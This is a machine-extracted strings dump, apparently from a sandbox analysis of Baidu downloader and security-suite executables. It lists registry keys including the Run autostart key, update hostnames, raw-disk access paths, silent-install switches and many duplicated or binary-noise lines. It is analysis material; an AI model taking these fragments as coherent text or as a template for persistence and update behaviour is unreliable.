SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 95
Windows 98
Windows 98
Windows ME
Windows ME
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
okernel32.dll
okernel32.dll
HKEY_USERS
HKEY_USERS
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
system32\winlogon.exe
GWintrust.dll
GWintrust.dll
Crypt32.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
6BE417DD-264A-4678-A036-74D2173ECCEB
d-d-d
d-d-d
D823ABCA-A92F-429d-9E11-3779B5F682AA
D823ABCA-A92F-429d-9E11-3779B5F682AA
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
BDMUpdate.dll
B.bdtmp
B.bdtmp
.old_
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
\Global.db
\Global.db
Ciphlpapi.dll
Ciphlpapi.dll
C\\.\PhysicalDrive%d
C\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
0123456789
0123456789
BaidusdTray.exe
BaidusdTray.exe
bddownloader.exe_3300:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
8%uvP
8%uvP
;*u.SUj
;*u.SUj
PSSSSSSh
PSSSSSSh
>.uTV
>.uTV
j SSSSSSSh
j SSSSSSSh
aSSSh
aSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
YYtCP
YYtCP
asio.ssl
asio.ssl
asio.misc
asio.misc
D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp
D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.misc error
asio.ssl error
asio.ssl error
dtrp.download.iyuntian.com
dtrp.download.iyuntian.com
res.download.iyuntian.com
res.download.iyuntian.com
tk.download.iyuntian.com
tk.download.iyuntian.com
utk.download.iyuntian.com
utk.download.iyuntian.com
thread.exit_event
thread.exit_event
thread.entry_event
thread.entry_event
%s\Connection
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
VVV.baidu.com.cn
VVV.baidu.com.cn
HTTP/1.1
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
%s>
%s>
standalone="%s"
standalone="%s"
encoding="%s"
encoding="%s"
version="%s"
version="%s"
X;
X;
%s='%s'
%s='%s'
%s="%s"
%s="%s"
PKEY_CUSTOMNAME
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_START_STATUS
PKEY_GUID
PKEY_GUID
PKEY_MINORVERSION
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_EXEVERSION
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
PKEY_UPDATESERVERIP
PKEY_PSHASH
PKEY_PSHASH
PKEY_PSNAME
PKEY_PSNAME
PKEY_EXHASH
PKEY_EXHASH
PKEY_EXNAME
PKEY_EXNAME
PKEY_TNHASH
PKEY_TNHASH
PKEY_TNNAME
PKEY_TNNAME
PKEY_COREHASH
PKEY_COREHASH
PKEY_CORENAME
PKEY_CORENAME
PKEY_EXEHASH
PKEY_EXEHASH
PKEY_EXENAME
PKEY_EXENAME
PKEY_UPDATEURL
PKEY_UPDATEURL
PKEY_FILENAME
PKEY_FILENAME
PKEY_RESULT
PKEY_RESULT
up.download.iyuntian.com
up.download.iyuntian.com
PKEY_TTL
PKEY_TTL
PKEY_ISFIX
PKEY_ISFIX
PKEY_VERSION
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_FILECORE_NAME
PKEY_URL
PKEY_URL
PKEY_PERIOD
PKEY_PERIOD
kernel32.dll
kernel32.dll
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
portuguese-brazilian
portuguese-brazilian
FhModule = %u, pfunc = %u
FhModule = %u, pfunc = %u
DbgHelp.dll
DbgHelp.dll
crash.dmp
crash.dmp
0xX
0xX
DlBugReport.ini
DlBugReport.ini
DlBugReport.dat
DlBugReport.dat
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
%d.%d.%d.%d
%d.%d.%d.%d
,d-d-d d:d:d
,d-d-d d:d:d
[ 0xX ] %s [%s]
[ 0xX ] %s [%s]
Error: Write address 0xX
Error: Write address 0xX
Error: Read address 0xX
Error: Read address 0xX
version = %s
version = %s
%s-----------------------------------
%s-----------------------------------
Type: %s
Type: %s
Address: 0xX
Address: 0xX
bddownloader.exe
bddownloader.exe
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_DENORMAL_OPERAND
EXCEPTION_FLT_DENORMAL_OPERAND
(%d,%d,%d,%d)
(%d,%d,%d,%d)
0xX:
0xX:
%s::x;
%s::x;
0xX[%X] %s:
0xX[%X] %s:
%s::x
%s::x
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb
d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb
GetProcessHeap
GetProcessHeap
CreateIoCompletionPort
CreateIoCompletionPort
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyW
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
NetWkstaTransportEnum
NetWkstaTransportEnum
NETAPI32.dll
NETAPI32.dll
PSAPI.DLL
PSAPI.DLL
imagehlp.dll
imagehlp.dll
zcÃ
zcÃ
'DownloadProxy.EXE'
'DownloadProxy.EXE'
BDDownloadProxy.Downloader.1 = s 'Downloader Class'
BDDownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'
CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'
BDDownloadProxy.Downloader = s 'Downloader Class'
BDDownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'BDDownloadProxy.Downloader.1'
CurVer = s 'BDDownloadProxy.Downloader.1'
ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'
ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'
ProgID = s 'BDDownloadProxy.Downloader.1'
ProgID = s 'BDDownloadProxy.Downloader.1'
VersionIndependentProgID = s 'BDDownloadProxy.Downloader'
VersionIndependentProgID = s 'BDDownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
stdole2.tlbWWW
stdole2.tlbWWW
cuiMsgTypeWWW
cuiMsgTypeWWW
pMsgParamWWWd
pMsgParamWWWd
6|pTaskUrl
6|pTaskUrl
Created by MIDL version 6.00.0366 at Thu May 22 14:49:00 2014
Created by MIDL version 6.00.0366 at Thu May 22 14:49:00 2014
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
"7,,11,,7"
"7,,11,,7"
2222222222222222
2222222222222222
11///20.
11///20.
##!!! !!!##
##!!! !!!##
.02///11
.02///11
mM............................................................Mm
mM............................................................Mm
mM..........................................Mm
mM..........................................Mm
(((((((JgT..TgJ(((((((
(((((((JgT..TgJ(((((((
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
bdpunchproxy.dll
bdpunchproxy.dll
bddownload_config.xml
bddownload_config.xml
dl.dll
dl.dll
\bddownloader.exe
\bddownloader.exe
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
CLSID\%s\LocalServer32
CLSID\%s\LocalServer32
{%X-%X-%X-%X-%X%X}
{%X-%X-%X-%X-%X%X}
B.tlb
B.tlb
Mscoree.dll
Mscoree.dll
BDDownloadProxy.Downloader.1
BDDownloadProxy.Downloader.1
\Installlog.txt
\Installlog.txt
\bdcomproxy.dll
\bdcomproxy.dll
\7z.dll
\7z.dll
\bdpunchproxy.dll
\bdpunchproxy.dll
\dl.dll
\dl.dll
regsvr32.exe
regsvr32.exe
Kernel32.dll
Kernel32.dll
7z.dll
7z.dll
C\StringFileInfo\xx\
C\StringFileInfo\xx\
netsh.exe
netsh.exe
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
oiphlpapi.dll
oiphlpapi.dll
\Global.db
\Global.db
PBDD_Temp_Exe
PBDD_Temp_Exe
%*.*f
%*.*f
: %s/s
: %s/s
%s: %s
%s: %s
\TDConfig.ini
\TDConfig.ini
H\set.log
H\set.log
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe
(1-10240)
(1-10240)
1.0.108.0
1.0.108.0
BaiduHips.exe_3260:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
c:\clientci\workspace\hips_v1.1_fix_compile\basic\Output\release\BaiduHips.pdb
c:\clientci\workspace\hips_v1.1_fix_compile\basic\Output\release\BaiduHips.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDLogicUtils.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
MSVCP80.dll
MSVCP80.dll
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
MSVCR80.dll
MSVCR80.dll
_crt_debugger_hook
_crt_debugger_hook
VERSION.dll
VERSION.dll
@BaiduHips.exe
@BaiduHips.exe
%d.%d.%d.%d
%d.%d.%d.%d
BaiduHipsIU.dll
BaiduHipsIU.dll
BaiduHipsCore.dll
BaiduHipsCore.dll
1.1.0.733
1.1.0.733
BaiduHips.exe
BaiduHips.exe
BaiduAnSvc.exe_3664:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
..\src\google\protobuf\message_lite.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
%d.%d.%d
%d.%d.%d
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
1.0.1.1
1.0.1.1
%d.%d
%d.%d
d-d-d d:d:d
d-d-d d:d:d
RegKey
RegKey
CryptMsgGetParam
CryptMsgGetParam
CryptMsgClose
CryptMsgClose
CertFindCertificateInStore
CertFindCertificateInStore
CertFreeCertificateContext
CertFreeCertificateContext
CertCloseStore
CertCloseStore
CertGetNameStringW
CertGetNameStringW
CryptCATCatalogInfoFromContext
CryptCATCatalogInfoFromContext
RootKey
RootKey
SubKey
SubKey
IsNative64Key
IsNative64Key
Content-Length:%d
Content-Length:%d
s.x.baidu.com
s.x.baidu.com
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
.\update.pb.cc
%s:%u
%s:%u
%u.%u.%u.%u
%u.%u.%u.%u
addr %s not good...
addr %s not good...
Unsupported Media Type
Unsupported Media Type
HTTP Version not supported
HTTP Version not supported
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
1.0.0.1
1.0.0.1
.\header.pb.cc
.\header.pb.cc
https
https
ftpes
ftpes
ftps
ftps
tftp
tftp
% ;?:@=&,$/-_!.~*()
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDLogicUtils.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
BDMFrameWork.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
BDMSkin.dll
BDMSkin.dll
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegGetKeySecurity
RegGetKeySecurity
RegDeleteKeyW
RegDeleteKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
SHFileOperationW
SHFileOperationW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
MSVCP80.dll
MSVCP80.dll
PSAPI.DLL
PSAPI.DLL
WS2_32.dll
WS2_32.dll
MSVCR80.dll
MSVCR80.dll
_amsg_exit
_amsg_exit
_crt_debugger_hook
_crt_debugger_hook
USERENV.dll
USERENV.dll
WTSAPI32.dll
WTSAPI32.dll
imagehlp.dll
imagehlp.dll
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpQueryInfoW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestW
WININET.dll
WININET.dll
NETAPI32.dll
NETAPI32.dll
RegOpenKeyExA
RegOpenKeyExA
BaiduAnSvc.exe
BaiduAnSvc.exe
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AVCRtpPluginContainer@@
.?AVCRtpPluginContainer@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AVCRTPServer@@
.?AVCRTPServer@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVTSMsg@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVITSMsgStub@@
.?AVCCmdPluginLauncher@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVCExePluginLauncher@@
.?AVIPluginCmdExecutor@@
.?AVIPluginCmdExecutor@@
.?AUPluginInfoPassiveSaver@@
.?AUPluginInfoPassiveSaver@@
.?AVheader@http@bena@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
.?AVrequest@http@bena@@
ÿF=
ÿF=
6%7s7
6%7s7
00
00
7!8(868/:
7!8(868/:
?&???[?{?
?&???[?{?
3
2 2$2(2,20242
; ;$;(;,;0;4;
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
ntdll.dll
EXPLORER.EXE
explorer.exe
baiduanTray.exe
"%s" -stmd=12
winlogon.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
BaiduAnTray.exe
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
BaiduAn.exe
BaiduAnUpdate.exe
BaiduAnBugRpt.exe
Global\BDMMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
BDAFileHelper.exe
Global\BDMEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
BDALeakfixer.exe
Global\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
BDASoftmgr.exe
BDASWHelper.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
\BDPreL.exe
\RTPPlugins\RtpContainerConfig.xml
C:\test.exe
d-d-d d:d:d d
d:d:d
%s(%d)
Last Error : %u(%s)
Global\BDMMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
BDMNet.dll
\kernel32.dll
Windows 8.1
Windows 8.0
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
Kernel32.dll
r.dll
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
@Wintrust.dll
Crypt32.dll
xxxxxxxxxxxxxxxx
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
F6BE417DD-264A-4678-A036-74D2173ECCEB
{X-X-X-XX-XXXXXX}
D823ABCA-A92F-429d-9E11-3779B5F682AA
\NotInstalledPlugin.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
BUninstalledPlugins.xml
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
BPackCache.xml
BDMDownload.dll
B##cmd:
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
\Global.db
Diphlpapi.dll
D\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3971
BaiduanSvc.exeBDASWDeskGuide.exe_228:
.text
`.rdata
@.data
.rsrc
@.reloc
T$.SR
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BDASWDeskGuide.pdb
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
SHLWAPI.dll
BDMSkin.dll
KERNEL32.dll
EnumWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ole32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
GetProcessHeap
GetWindowsDirectoryW
SHELL32.dll
imagehlp.dll
BDASWDeskGuide.exe
7,787\7|7
SWDesktopHide.xml
SWDesktopGuideWnd.xml
bg_guide_left.png
bg_guide_right.png
SWDesktopGuide{ACE6587A-7508-4cbe-93BD-A2AAE304F5B5}
